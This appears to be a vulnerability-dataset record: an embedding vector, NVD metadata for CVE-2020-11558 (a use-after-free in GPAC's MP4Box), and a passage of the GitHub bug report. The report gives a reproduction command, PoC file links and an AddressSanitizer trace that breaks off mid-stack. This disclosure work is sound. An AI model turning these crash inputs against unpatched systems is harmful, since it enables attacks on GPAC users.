-0.0013958828058093786, 0.011249172501266003, -0.006800263188779354, 0.008345438167452812, -0.011017769575119019, 0.00011109444312751293, 0.02482730522751808, 0.01033102534711361, 0.00068581139203161, 0.005471562035381794, -0.005199103616178036, 0.01522781141102314, 0.026902467012405396, -0.0014854581095278263, -0.019721509888768196, -0.0020994225051254034, -0.005146851297467947, -0.0022412503603845835, -0.028574541211128235, 0.0013706897152587771, -0.0002168236969737336, -0.0280221588909626, 0.015765264630317688, -0.027096547186374664, -0.004807210993021727, 0.012503228150308132, -0.0017635149415582418, 0.011032698675990105, -0.007770662661641836, 0.019303491339087486, 0.008226004429161549, 0.0015125173376873136, -0.006897302810102701, 0.017989719286561012, -0.029470294713974, -0.010278772562742233, -0.0037173775490373373, 0.0003753300989046693, -0.02927621454000473, -0.003603542223572731, 0.014615713618695736, -0.0042510973289608955, -0.005923171062022448, 0.004374263808131218, 0.013137719593942165, -0.014944156631827354, 0.01454106718301773, 0.0012811142951250076, 0.012689842842519283, -0.015601042658090591, 0.0029335932340472937, 0.0008313713478855789, -0.004333208315074444, -0.0023737470619380474, -0.018139010295271873, 0.00197998876683414, -0.0018278972711414099, -0.01933334954082966, 0.004478767979890108, -0.016317645087838173, -0.018422666937112808, 0.030694492161273956, -0.010062298737466335, 0.014026009477674961, -0.007180958520621061, -0.004426515661180019, 0.020915847271680832, -0.01057735737413168, 0.005688035394996405, 0.0048184082843363285, 0.012921245768666267, -0.01663115993142128, 0.0019333349773660302, 0.010913264937698841, 0.010248914361000061, 0.009368089959025383, 0.020303748548030853, -0.0014975881204009056, -0.015615971758961678, -0.003790157614275813, -0.00756538612768054, -0.006188164930790663, 0.018586888909339905, 0.0036949836649000645, -0.002636874793097377, -0.023976339027285576, -0.002773104002699256, -0.010263843461871147, -0.018706321716308594, 0.0026126147713512182, -0.03657660633325577, -0.01204042136669159, -0.0003149133990518749, -0.015056125819683075, 0.01104762777686119, 0.021707097068428993, -0.0155114671215415, -0.009935400448739529, 0.004475035704672337, -0.003241508500650525, -0.019721509888768196, 0.027141334488987923, 0.012227036990225315, 0.008308115415275097, -0.00018813158385455608, -0.013705031014978886, -0.0025099762715399265, -0.018751109018921852, -0.002362550236284733, 0.014929227530956268, -0.004725100472569466, -0.016347503289580345, -0.0213786531239748, 0.01891533099114895, -0.016959602013230324, 0.039174292236566544, 0.02270735427737236, 0.00971892662346363, 0.005437971092760563, 0.017452266067266464, 0.0010413136333227158, 0.00820361077785492, -0.005505152512341738, -0.0055648693814873695, -0.002801096299663186, 0.012443510815501213, 0.014779934659600258, 0.01864660531282425, 0.005527546629309654, -0.00900232419371605, -0.025872351601719856, -0.0017821765504777431, 0.007263069041073322, -0.008084177039563656, -0.0013884181389585137, 0.02779822051525116, 0.0005290544941090047, -0.011697049252688885, -0.02403605543076992, -0.022722283378243446, -0.0007035398157313466, 0.007173493504524231, 0.019736438989639282, 0.0071958876214921474, 0.0029130654875189066, 0.010241449810564518, 0.007416093721985817, -0.00803192425519228, 0.008330509066581726, -0.01572047546505928, -0.0003743970301002264, -0.024319712072610855, -0.006072463002055883, 0.003663259092718363, 0.026603883132338524, 0.010151874274015427, -0.03302345052361488, 0.00501248799264431, 0.004859463311731815, 0.0007277998374775052, -0.006553930696099997, 0.0010777035495266318, -0.0077184103429317474, -0.008524589240550995, -0.01807929389178753, -0.01636243239045143, -0.018392808735370636, -0.029067205265164375, -0.007080186158418655, 0.008494730107486248, 0.021513016894459724, -0.003855472896248102, -0.0005948364268988371, -0.0021423441357910633, -0.041861552745103836, -0.0043779960833489895, -0.03132151812314987, 0.012353935278952122, -0.008106570690870285, 0.00014625977200921625, 0.01660129986703396, -0.028052018955349922, -0.009592028334736824, 0.009174009785056114, 0.015780193731188774, -0.006718152202665806, 0.0018353619379922748, -0.025737987831234932, -0.027514565736055374, 0.003291894681751728, -0.014511208981275558, 0.001111294375732541, 0.01712382398545742, 0.004363066516816616, -0.0032545714639127254, -0.0053483955562114716, -0.012734631076455116, -0.010607215575873852, -0.010017511434853077, -0.00842754915356636, -0.0009722659015096724, 0.004381728358566761, -0.02502138540148735, -0.0027040562126785517, -0.02073669619858265, -0.0046915095299482346, -0.018243515864014626, -0.005561137106269598, -0.004713903646916151, 0.004762423690408468, 0.006199361756443977, -0.017526913434267044, 0.0025510317645967007, -0.01283167116343975, 0.013555738143622875, -0.019169127568602562, 0.019303491339087486, -0.01163733284920454, 0.002607016358524561, -0.008882890455424786, 0.007550456561148167, -0.002172202570363879, -0.0055909957736730576, -0.011256637051701546, -0.012786882929503918, -0.01165972650051117, 0.00098999438341707, -0.0016366165364161134, -0.00775573356077075, 0.024663083255290985, 0.014376846142113209, -0.008546982891857624, -0.005404380150139332, 0.030052535235881805, -0.009868219494819641, -0.013593061827123165, 0.017407478764653206, 0.003523297607898712, -0.01727311685681343, -0.008897819556295872, -0.01139100082218647, -0.0037285746075212955, 0.01667594723403454, -0.006512875203043222, -0.007964742369949818, -0.010562428273260593, -0.021363724023103714, -0.0045944699086248875, -0.0001982787944143638, -0.007464613765478134, 0.0016263526631519198, 0.016048919409513474, 0.01712382398545742, -0.009621886536478996, 0.001567568862810731, -0.005770146381109953, 0.012734631076455116, 0.00667336443439126, 0.015033732168376446, 0.04914701730012894, 0.006270275451242924, 0.012913781218230724, 0.004254829604178667, -0.008897819556295872, -0.0018885472090914845, 0.01179408933967352, -0.004094340372830629, 0.008323044516146183, -0.0035792822018265724, 0.0021255486644804478, 0.00947259459644556, -0.002375613199546933, 0.0066173798404634, 0.030843783169984818, -0.012943640351295471, -0.020288819447159767, -0.005352127831429243, 0.009323302656412125, 0.03159024566411972, 0.0011924720602110028, -0.0019519964698702097, 0.003963709808886051, -0.018124081194400787, -0.00152371427975595, 0.0013781542656943202, -0.008853031322360039, 0.003719243686646223, 0.0019463980570435524, -0.02184145897626877, -0.014033474028110504, -0.0232000183314085, 0.019258704036474228, 0.017437336966395378, 0.006841318216174841, 0.009017253294587135, 0.0155114671215415, 0.0032471069134771824, 0.003045562421903014, -0.012659984640777111, -0.0289328433573246, 0.004314546473324299, -0.007807985879480839, -0.014735147356987, -0.013115325942635536, 0.022110186517238617, -0.013637849129736423, -0.0031743268482387066, -0.0013370988890528679, 0.02031867764890194, 0.006505410652607679, 0.017452266067266464, 0.007822914980351925, -0.009435271844267845, -0.0075355274602770805, 0.009159080684185028, -0.01739254966378212, -0.00420630956068635, -0.012936175800859928, -0.005027417093515396, 0.033590760082006454, -0.0018782834522426128, -0.018273374065756798, -0.0022001948673278093, 0.012936175800859928, 0.018736179918050766, 0.008882890455424786, 0.0008565644384361804, -0.0037304407451301813, -0.014690360054373741, 0.008748527616262436, 0.011032698675990105, -0.005717894062399864, -0.0012559212045744061, 0.0030474285595119, 0.021274149417877197, -0.0031780593562871218, -0.016347503289580345, -0.0036296683829277754, -0.003487840760499239, -0.028499895706772804, 0.005643248092383146, -0.01906462386250496, -0.00046980413026176393, -0.009629352018237114, 0.00797220692038536, 0.006412103306502104, 0.0015936950221657753, -0.004549682140350342, 0.004646722227334976, 0.009076970629394054, 0.014003614895045757, -0.0264695193618536, -0.008718668483197689, -0.0024521255400031805, -0.019661791622638702, 0.021333865821361542, 0.007520598359405994, -0.006180699914693832, 0.0029858455527573824, -0.010316096246242523, -0.010517640970647335, -0.0003753300989046693, -0.03427750617265701, -0.011517899110913277, 0.021214431151747704, -0.01418276596814394, 0.006971949245780706, 0.0006601517670787871, -0.03287415951490402, -0.023020869120955467, -0.0058895801194012165, -0.010540034621953964, -0.012174785137176514, 0.003633400658145547, 0.0040271589532494545, -0.0007324652397073805, -0.012645055539906025, 0.00017378553457092494, -0.017571700736880302, -0.005721626337617636, 0.032217271625995636, -0.015235276892781258, 0.008748527616262436, -0.010607215575873852, -0.018392808735370636, 0.018706321716308594, 0.0011355543974786997, -0.010741579346358776, -0.01766127534210682, 0.02172202616930008, -0.012241966091096401, -0.000012210183740535285, -0.007927419617772102, 0.0007791190291754901, -0.006800263188779354, 0.03344146907329559, 0.00797220692038536, 0.017915071919560432, 0.001379087334498763, 0.001385618932545185, -0.013287012465298176, -0.011816482990980148, -0.0007417959859594703, 0.0022300533019006252, 0.006042604800313711, -0.011122274212539196, 0.008099106140434742, -0.018213657662272453, -0.0022860378958284855, -0.017526913434267044, 0.008397690020501614, 0.011592544615268707, 0.008330509066581726, -0.0000994893052848056, -0.0008528321050107479, 0.02433464117348194, 0.007987136952579021, -0.018407737836241722, -0.004224971402436495, -0.023244807496666908, 0.010480317287147045, 0.014309664256870747, 0.0014789266278967261, -0.0007478609913960099, -0.0034523839130997658, -0.016466937959194183, 0.0032583039719611406, 0.01769113354384899, -0.01015933882445097, 0.0034561161883175373, 0.011562686413526535, 0.020527686923742294, -0.01000258233398199, 0.014040938578546047, -0.013996150344610214, -0.004217506852000952, 0.0011327550746500492, 0.013227295130491257, 0.00543050654232502, -0.005322269629687071, 0.014876974746584892, -0.011152132414281368, 0.0046019344590604305, 0.02066205069422722, -0.005579798482358456, -0.01212999690324068, 0.01990065909922123, 0.0017672473331913352, -0.01837787963449955, -0.008853031322360039, 0.03251585736870766, 0.005087134428322315, -0.019617004320025444, -0.030664632096886635, 0.014391775242984295, 0.02167723886668682, 0.01933334954082966, -0.016810309141874313, -0.00045650778338313103, -0.013660242781043053, 0.0066547030583024025, -0.009621886536478996, 0.0006988744717091322, 0.008741062134504318, -0.0013100396608933806, 0.0045758080668747425, 0.014444027096033096, 0.009592028334736824, -0.01879589632153511, -0.011876200325787067, 0.013361657969653606, 0.0476839505136013, 0.010816224850714207, 0.03293387591838837, -0.0072033521719276905, -0.02145330049097538, -0.00867388118058443, 0.027768362313508987, -0.016735663637518883, -0.01204042136669159, -0.005609657149761915, 0.013294477015733719, -0.011017769575119019, 0.00953231193125248, 0.001950130332261324, -0.00894260685890913, -0.014690360054373741, 0.0046840449795126915, 0.005852256901562214, -0.009256120771169662, 0.01204042136669159, -0.010345954447984695, -0.0017989719053730369, 0.012406188063323498, 0.017870284616947174, 0.0008178417338058352, 0.018288303166627884, -0.0033310838043689728, -0.0011952712666243315, -0.006240416783839464, -0.028604399412870407, -0.006971949245780706, 0.002577157923951745, 0.007464613765478134, 0.007438487373292446, -0.01731790415942669, -0.02031867764890194, 0.007882632315158844, 0.005195370875298977, -0.021363724023103714, -0.0165565125644207, 0.01807929389178753, 0.007124973926693201, 0.05252102017402649, -0.01606384851038456, 0.015406962484121323, -0.015466679818928242, 0.003734173020347953, -0.004810943268239498, -0.0200947392731905, -0.003153799334540963, -0.0030586253851652145, 0.005270017310976982, 0.018810827285051346, 0.013473628088831902, -0.005617121700197458, 0.006378512363880873, 0.0038050867151468992, -0.0073936996050179005, -0.022184832021594048, 0.03329217806458473, -0.006583789363503456, -0.00501248799264431, 0.0192885622382164, 0.011428323574364185, -0.015056125819683075, -0.012286754325032234, -0.009599492885172367, -0.009905542246997356, 0.0026835286989808083, -0.0013912173453718424, -0.019721509888768196, 0.0010553097818046808, 0.01727311685681343, 0.027768362313508987, -0.03353104367852211, -0.0023065656423568726, 0.021513016894459724, -0.0414733923971653, -0.03454623371362686, 0.001190605922602117, 0.009397948160767555, -0.009181474335491657, 0.0011514166835695505, 0.010256378911435604, 0.0016524788225069642, 0.002745111705735326, 0.013690100982785225, -0.005837327800691128, 0.012473369017243385, 0.01033102534711361, -0.0104206008836627, -0.008367831818759441, -0.02317016012966633, -0.014891903847455978, -0.005523813888430595, 0.0007870502304285765, -0.0032396423630416393, -0.006740546319633722, 0.023155231028795242, 0.019721509888768196, 0.021408511325716972, -0.01044299453496933, -0.022035539150238037, -0.010301167145371437, -0.008838102221488953, 0.011719443835318089, -0.0032974930945783854, 0.002528637880459428, -0.009465130046010017, 0.008897819556295872, -0.0076437643729150295, 0.013846858404576778, 0.012913781218230724, 0.0032265791669487953, -0.0026779300533235073, 0.019273633137345314, 0.004650454502552748, 0.0037360391579568386, 0.009957795031368732, 0.0061135184951126575, 0.03466566652059555, 0.026723315939307213, 0.011070022359490395, 0.006408371031284332, -0.03606901317834854, 0.007490739692002535, 0.02339409850537777, -0.012533086352050304, -0.020990492776036263, 0.0023588179610669613, -0.03302345052361488, -0.0013165712589398026, 0.007386235054582357, -0.0264695193618536, 0.008897819556295872, 0.0040346235036849976, -0.00014917564112693071, -0.025454333052039146, 0.014055867679417133, 0.004288420546799898, 0.028888054192066193, 0.0025902208872139454, -0.009047111496329308, 0.004120466765016317, 0.0031817916315048933, 0.002732048509642482, -0.01321236602962017, -0.029171710833907127, 0.018736179918050766, 0.0069868783466517925, -0.007696016691625118, 0.006863712333142757, 0.0006130313850007951, -0.03030633181333542, 0.007800521329045296, 0.0076437643729150295, -0.0030436962842941284, -0.007352644577622414, 0.0029056009370833635, 0.02312537282705307, -0.0029783807694911957, 0.0023009672295302153, -0.0022412503603845835, 0.006027675699442625, -0.01108495146036148, -0.007322785910218954, 0.009032182395458221, 0.007584047503769398, 0.01670580543577671, -0.01334672886878252, 0.011167062446475029, -0.009099364280700684, -0.016452008858323097, 0.006042604800313711, -0.006098589394241571, 0.013264618813991547, -0.017362691462039948, -0.01978122629225254, -0.0056731062941253185, -0.009293444454669952, 0.014608249068260193, -0.006300134118646383, -0.014257412403821945, 0.012921245768666267, 0.018706321716308594, 0.011346212588250637, -0.011734372936189175, -0.005001291166990995, 0.0022561794612556696, 0.020139528438448906, -0.003829346736893058, 0.009711462073028088, -0.03117222711443901, -0.001617955043911934, 0.008770921267569065, -0.011734372936189175, 0.0024092041421681643, 0.016586370766162872, -0.0011392866726964712, -0.006512875203043222, -0.01338405255228281, -0.02570812962949276, 0.017258185893297195, -0.010659468360245228, -0.0019128072308376431, -0.01127903163433075, 0.029440436512231827, 0.010890871286392212, 0.013294477015733719, 0.015406962484121323, 0.013264618813991547, -0.012883923016488552, 0.0032191146165132523, -0.000725467165466398, 0.011816482990980148, 0.014100654982030392, 0.006677096709609032, -0.012876458466053009, -0.008188680745661259, 0.007763198111206293, 0.005031149368733168, 0.01689988560974598, 0.029231427237391472, 0.008352902717888355, -0.0029522546101361513, 0.014272341504693031, -0.019721509888768196, -0.003812551498413086, -0.005661909468472004, 0.012256895191967487, 0.0025379685685038567, 0.01572047546505928, 0.022184832021594048, 0.022304264828562737, 0.014302199706435204, -0.018288303166627884, 0.021393582224845886, -0.001408012700267136, -0.007696016691625118, -0.019572217017412186, 0.013107861392199993, 0.00476615596562624, -0.011480575427412987, 0.0056917681358754635, 0.005075937137007713, 0.009375554509460926, -0.021483158692717552, -0.005747752729803324, 0.016616230830550194, 0.011532828211784363, 0.006665899883955717, -0.011002840474247932, 0.008763456717133522, 0.01788521371781826, -0.010069764219224453, -0.011928452178835869, -0.001920271897688508, -0.007166028954088688, 0.02657402493059635, 0.0018101688474416733, -0.029097063466906548, -0.013906574808061123, -0.02964944578707218, -0.006244149524718523, -0.01086101308465004, -0.011443252675235271, 0.01072665024548769, -0.0007968475110828876, -0.005378254223614931, -0.005437971092760563, 0.003191122319549322, -0.006277740001678467, 0.022886505350470543, -0.02066205069422722, -0.016123564913868904, 0.018751109018921852, 0.008054317906498909, -0.0034225252456963062, 0.008785850368440151, 0.005161780398339033, 0.027066688984632492, -0.009397948160767555, -0.02039332501590252, -0.003997300751507282, -0.00300450692884624, 0.008539518341422081, -0.01815394125878811, 0.006557662971317768, -0.013182507827877998, -0.0060948571190238, 0.01207774505019188, 0.010890871286392212, 0.0028701438568532467, 0.01121931429952383, -0.024812376126646996, 0.008912748657166958, 0.01212999690324068, 0.005165512673556805, 0.01685509830713272, 0.005822398699820042, -0.009741321206092834, 0.009129222482442856, -0.015347246080636978, 0.010114551521837711, -0.004620595835149288, 0.006001549307256937, -0.00366885750554502, 0.006583789363503456, -0.012518157251179218, -0.010069764219224453, -0.004874392878264189, 0.00595302926376462, 0.016078777611255646, 0.0031015470158308744, -0.02873876318335533, 0.0052588204853236675, 0.00595302926376462, -0.0030996808782219887, -0.00268726097419858, -0.01901983469724655, 0.004687777254730463, -0.013443768955767155, -0.008733597584068775, -0.002901868661865592, -0.0152427414432168, -0.011002840474247932, -0.009271049872040749, -0.029783807694911957, -0.0007954479078762233, 0.01860181801021099, 0.013779676519334316, 0.0009480059379711747, 0.02157273329794407, 0.015183024108409882, 0.008352902717888355, -0.024394357576966286, 0.0010926327668130398, 0.017138753086328506, 0.0007954479078762233, -0.01963193342089653, -0.0168252382427454, -0.008599234744906425, 0.007240675389766693, 0.003933851607143879, 0.011756766587495804, 0.012204643338918686, 0.016108635812997818, -0.011070022359490395, -0.020303748548030853, 0.011801553890109062, -0.0021572732366621494, 0.014085725881159306, 0.013048144988715649, -0.001212999690324068, -0.0006984079373069108, -0.0031612638849765062, 0.0022412503603845835, -0.007651228923350573, 0.005262552760541439, 0.01279434747993946, -0.01643707975745201, 0.02073669619858265, 0.034426797181367874, -0.01110734511166811, 0.02585742250084877, 0.023946480825543404, -0.008599234744906425, 0.003114609979093075, 0.022125115618109703, 0.023140301927924156, 0.004314546473324299, -0.006441961508244276, -0.003114609979093075, -0.01761648803949356, 0.02157273329794407, 0.014130513183772564, 0.008114035241305828, -0.0018624210497364402, 0.0032172484789043665, -0.02290143445134163, 0.010189197957515717, 0.009121757932007313, 0.019258704036474228, -0.002763773314654827, 0.01616835407912731, -0.010704255662858486, -0.0019240041729062796, 0.010390741750597954, 0.0049341097474098206, -0.015332316048443317, 0.0017756449524313211, 0.015526396222412586, -0.004874392878264189, -0.008076711557805538, -0.0005831729504279792, 0.018333090469241142, 0.010144409723579884, -0.008912748657166958, -0.007681087590754032, -0.01230168342590332, -0.006124715320765972, 0.009047111496329308, 0.009188939817249775, 0.002425999380648136, 0.0032601701095700264, 0.004068214446306229, -0.010428065434098244, -0.010092157870531082, 0.0015647696563974023, -0.01268237829208374, -0.007651228923350573, 0.008927677758038044, 0.004295885097235441, 0.00024819839745759964, 0.005228961817920208, 0.017870284616947174, -0.0262007936835289, 0.00622921995818615, -0.015347246080636978, 0.0015507735079154372, 0.002159139607101679, 0.005493955686688423, -0.003982371184974909, -0.019840942695736885, -0.012368864379823208, 0.01898997649550438, -0.005594728048890829, -0.014951621182262897, -0.028261026367545128, 0.0013930834829807281, -0.005131921730935574, -0.02122936211526394, 0.013719960115849972, 0.0034766437020152807, 0.011070022359490395, 0.005900776945054531, 0.02723091095685959, -0.011167062446475029, 0.0037808269262313843, 0.017526913434267044, 0.011144667863845825, 0.019840942695736885, 0.00004201761112199165, 0.01621314138174057, -0.011510434560477734, -0.005680570844560862, 0.02745484933257103, -0.010495246388018131, -0.004531020298600197, -0.004042088519781828, 0.009853290393948555, 0.010681862011551857, 0.0073115890845656395, -0.012839135713875294, 0.011995634064078331, -0.006811460014432669, -0.002388676395639777, 0.008703739382326603, 0.009039646945893764, 0.007397432345896959, -0.007733339909464121, 0.0019072088180109859, 0.010144409723579884, -0.010943124070763588, -0.014884439297020435, 0.005005023442208767, -0.011801553890109062, 0.0216473788022995, -0.010413136333227158, -0.003892796114087105, 0.019736438989639282, 0.024513790383934975, 0.009211333468556404, -0.01340644620358944, -0.01015933882445097, 0.011092416010797024, -0.022244548425078392, 0.0050423466600477695, -0.013928969390690327, -0.004803478717803955, -0.03759179264307022, -0.01351841539144516, -0.011368606239557266, 0.00274324556812644, -0.007587779778987169, 0.001538643497042358, -0.00960695743560791, -0.02391662262380123, 0.022647637873888016, 0.00728919543325901, 0.00827825628221035, 0.006147109437733889, -0.01727311685681343, 0.012958569452166557, 0.01013694517314434, 0.01921391487121582, 0.019870800897479057, -0.0063299923203885555, 0.01486951019614935, -0.0053334664553403854, 0.009771179407835007, 0.012958569452166557, -0.01660129986703396, -0.0022636440116912127, 0.008636558428406715, -0.01936320774257183, -0.023110443726181984, 0.009995117783546448, 0.015526396222412586, 0.01807929389178753, 0.005363325122743845, -0.005527546629309654, 0.011159596964716911, -0.007550456561148167, 0.02654416672885418, 0.00048426681314595044, -0.006087392568588257, -0.01857195794582367, 0.005236426368355751, -0.0007716544205322862, -0.008285720832645893, 0.005654444918036461, 0.05926903337240219, 0.004310814198106527, 0.014197695069015026, 0.011256637051701546, -0.005191638600081205, -0.010943124070763588, -0.004463838879019022, 0.0046765804290771484, -0.004280955996364355, -0.017004389315843582, -0.004355601966381073, 0.006908500101417303, 0.010846083983778954, 0.005986620206385851, -0.013675171881914139, -0.007587779778987169, -0.0005677771987393498, -0.022154973819851875, -0.0037509682588279247, -0.022080326452851295, -0.01975136809051037, 0.003799488302320242, 0.03565099462866783, -0.008494730107486248, -0.014727682806551456, -0.0007632567430846393, 0.016646089032292366, -0.01860181801021099, 0.026335157454013824, -0.02152794599533081, 0.02897763065993786, -0.0017019319348037243, -0.004870660603046417, -0.006766672246158123, -0.0014266743091866374, 0.020721767097711563, 0.014406704343855381, 0.017511984333395958, -0.0023289595264941454, -0.008263327181339264, 0.0009148817043751478, 0.006669632159173489, -0.022274406626820564, 0.001227928907610476, -0.0020397056359797716, 0.001840960350818932, -0.004094340372830629, -0.0031090115662664175, -0.0007534594624303281, 0.00506847258657217, 0.005221497267484665, 0.016198212280869484, 0.0029335932340472937, 0.013921504840254784, -0.0035568883176892996, 0.00825586263090372, 0.008651487529277802, -0.018557028844952583, -0.009539776481688023, -0.005314805079251528, -0.021333865821361542, -0.014123048633337021, -0.0022767072077840567, -0.00020201111328788102, -0.013891645707190037, -0.0002610282099340111, 0.016317645087838173, 0.040040187537670135, -0.007468346040695906, 0.015362175181508064, 0.003536360803991556, 0.003428123891353607, -0.034994110465049744, 0.0006074329139664769, -0.00004006398012279533, -0.021513016894459724, 0.01420515961945057, -0.01207774505019188, -0.004855731036514044, 0.007927419617772102, -0.005281214136630297, -0.0011747435200959444, 0.01621314138174057, -0.000483800278743729, -0.017974790185689926, -0.006598718464374542, -0.012331541627645493, -0.018512241542339325, -0.007416093721985817, 0.016377361491322517, 0.011435788124799728, 0.02666359953582287, -0.00270032393746078, -0.002123682526871562, 0.0032527053263038397, 0.001104762777686119, -0.004426515661180019, 0.0008789582643657923, 0.0066621676087379456, 0.0043593342415988445, 0.025051243603229523, 0.01879589632153511, -0.015451750718057156, 0.015048661269247532, -0.0005780410137958825, 0.006102321669459343, 0.01232407707720995, 0.01312279049307108, 0.009285978972911835, -0.006643506232649088, 0.03350118547677994, -0.009136687032878399, -0.0017177942208945751, 0.007807985879480839, 0.011898593977093697, 0.01719846948981285, -0.015750335529446602, 0.012562944553792477, 0.006516607943922281, 0.0044936975464224815, -0.005729090888053179, -0.0015843642177060246, 0.0440412200987339, -0.004113002214580774, 0.01027130801230669, -0.006236684508621693, -0.012421117164194584, 0.020258961245417595, 0.00703539839014411, -0.008912748657166958, -0.014167836867272854, -0.01734776236116886, 0.023259736597537994, 0.0069868783466517925, -0.020154457539319992, 0.015421891584992409, -0.01027130801230669, 0.039204150438308716, 0.02263270877301693, 0.0007534594624303281, -0.02832074463367462, 0.047295793890953064, -0.02369268424808979, 0.002021044259890914, -0.018960118293762207, 0.008240933530032635, -0.010338489897549152, 0.010674397461116314, -0.015974273905158043, -0.007375038228929043, 0.01704917848110199, 0.029828596860170364, 0.01963193342089653, 0.008748527616262436, -0.006781601347029209, 0.00002385177322139498, -0.01152536366134882, 0.011928452178835869, 0.003892796114087105, -0.018094222992658615, 0.0013548274291679263, 0.008927677758038044, 0.014115584082901478, 0.009920471347868443, 0.020557545125484467, 0.007371305953711271, 0.0069047678261995316, -0.009659210219979286, 0.014391775242984295, -0.0008211074746213853, -0.012234501540660858, -0.00742355827242136, -0.004176451358944178, 0.001935201114974916, 0.01515316590666771, 0.021438369527459145, 0.003200453007593751, -0.014772470109164715, -0.0046765804290771484, 0.0002199728332925588, 0.0014565327437594533, 0.009995117783546448, -0.016466937959194183, 0.013742353767156601, 0.044071078300476074, 0.002664867090061307, -0.007222013548016548, -0.017646346241235733, 0.01993051916360855, 0.006027675699442625, 0.01340644620358944, 0.006856247782707214, 0.00570669723674655, 0.0011140935821458697, -0.015421891584992409, 0.025305040180683136, 0.014115584082901478, -0.002745111705735326, 0.011995634064078331, -0.0032862962689250708, 0.006083660293370485, -0.02726076915860176, 0.016989460214972496, -0.005811201874166727 ]
172
CVE-2020-11558
2020-04-05T20:15:12.650000
An issue was discovered in libgpac.a in GPAC 0.8.0, as demonstrated by MP4Box. audio_sample_entry_Read in isomedia/box_code_base.c does not properly decide when to make gf_isom_box_del calls. This leads to various use-after-free outcomes involving mdia_Read, gf_isom_delete_movie, and gf_isom_parse_movie_boxes.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/6063b1a011c3f80cee25daade18154e15e4c058c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1440" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1440
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, I found 3 new UAF bugs on the lastest commit 56eaea8 of GPAC version 0.8.0. I think it is probably due to **an imcomplete fix** of the UAF bug https://github.com/gpac/gpac/issues/1340. Actually, these new bugs share the same buggy function which is `gf_isom_box_del()` in src/isomedia/box_funcs.c with https://github.com/gpac/gpac/issues/1340, but have different alloc function `esds_New()` in `src/isomedia/box_code_base.c` (instead of `stco_New()`). Command: `MP4Box -info $POC` or `MP4Box -diso $POC` #### 1) UAF Bug 1 PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_56eaea8/uaf1 ASAN says: ~~~ ================================================================= ==31565==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000dde8 at pc 0x0000006c601e bp 0x7fff726c3b70 sp 0x7fff726c3b60 READ of size 8 at 0x60400000dde8 thread T0 #0 0x6c601d in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 #1 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #2 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #3 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #4 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #5 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #6 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #7 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #8 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #9 0x6c72cd in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1427 #10 0xae0b0f in mdia_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3021 #11 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #12 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #13 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #14 0xaeffe8 in trak_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:7188 #15 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #16 0x6c6456 in gf_isom_box_parse_ex 